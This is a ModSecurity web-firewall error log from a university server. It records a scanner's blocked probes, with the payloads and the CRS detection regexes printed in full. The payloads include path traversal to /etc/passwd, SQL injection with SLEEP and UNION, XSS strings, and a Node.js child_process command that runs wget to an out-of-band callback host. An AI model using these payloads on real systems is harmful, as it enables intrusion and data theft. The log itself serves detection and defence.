"repositoryfh.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAARphBoAAAAU"]
[Tue Aug 29 11:44:03.614889 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAfZj10AAAAN"]
[Tue Aug 29 11:44:03.655481 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAfZj18AAAAN"]
[Tue Aug 29 11:44:08.380087 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAfky98AAAAi"]
[Tue Aug 29 11:44:08.411137 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAfSWZsAAAAB"]
[Tue Aug 29 11:44:08.431031 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAfSWZwAAAAB"]
[Tue Aug 29 11:44:10.535161 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAdTBKAAAAAY"]
[Tue Aug 29 11:44:13.455008 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdOeZEAAAAS"]
[Tue Aug 29 11:44:14.465079 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAdftfMAAAAG"]
[Tue Aug 29 11:44:16.472414 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gp9egkeymmccd1.oast.site found within TX:1: cjmnbitjmimt14dgn26gp9egkeymmccd1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAdftf0AAAAG"]
[Tue Aug 29 11:44:19.383270 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAdOeaEAAAAS"]
[Tue Aug 29 11:44:20.379722 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26g1sy814taccgsy.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAe3@BMAAAAA"]
[Tue Aug 29 11:44:23.563545 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAftVE0AAAAf"]
[Tue Aug 29 11:44:26.385279 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAftVFMAAAAf"]
[Tue Aug 29 11:44:27.395364 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfZj44AAAAN"]
[Tue Aug 29 11:44:29.479202 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAdftiYAAAAG"]
[Tue Aug 29 11:44:32.477144 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAenGhgAAAAM"]
[Tue Aug 29 11:44:35.414878 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAfiYokAAAAg"]
[Tue Aug 29 11:44:36.403483 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gz74tri67xhnko.oast.site found within TX:1: cjmnbitjmimt14dgn26gz74tri67xhnko.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/composer.json/send_email"] [unique_id "ZO13tMCo-f0AAAfiYowAAAAg"]
[Tue Aug 29 11:44:44.361369 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13vMCo-f0AAAfbkssAAAAZ"]
[Tue Aug 29 11:44:44.425371 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAg4DbYAAAAI"]
[Tue Aug 29 11:44:47.654721 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAfcoUUAAAAa"]
[Tue Aug 29 11:44:47.743033 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAg-pKUAAAAR"]
[Tue Aug 29 11:44:48.385751 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfiYq4AAAAg"]
[Tue Aug 29 11:44:48.437437 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAfiYrAAAAAg"]
[Tue Aug 29 11:44:49.421902 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAg-pK0AAAAR"]
[Tue Aug 29 11:44:50.439161 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAdOefoAAAAS"]
[Tue Aug 29 11:44:51.396114 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13w8Co-f0AAAfSWfUAAAAB"]
[Tue Aug 29 11:44:51.436521 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAhISOkAAAAH"]
[Tue Aug 29 11:44:53.467418 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAfEBz4AAAAO"]
[Tue Aug 29 11:44:56.584977 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfbkuUAAAAZ"]
[Tue Aug 29 11:44:59.483837 2023] [:error] [pid 2143] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAhfdnQAAAAa"]
[Tue Aug 29 11:45:00.366072 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zMCo-f0AAAfSWiIAAAAB"]
[Tue Aug 29 11:45:01.016504 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zcCo-f0AAAfbku0AAAAZ"]
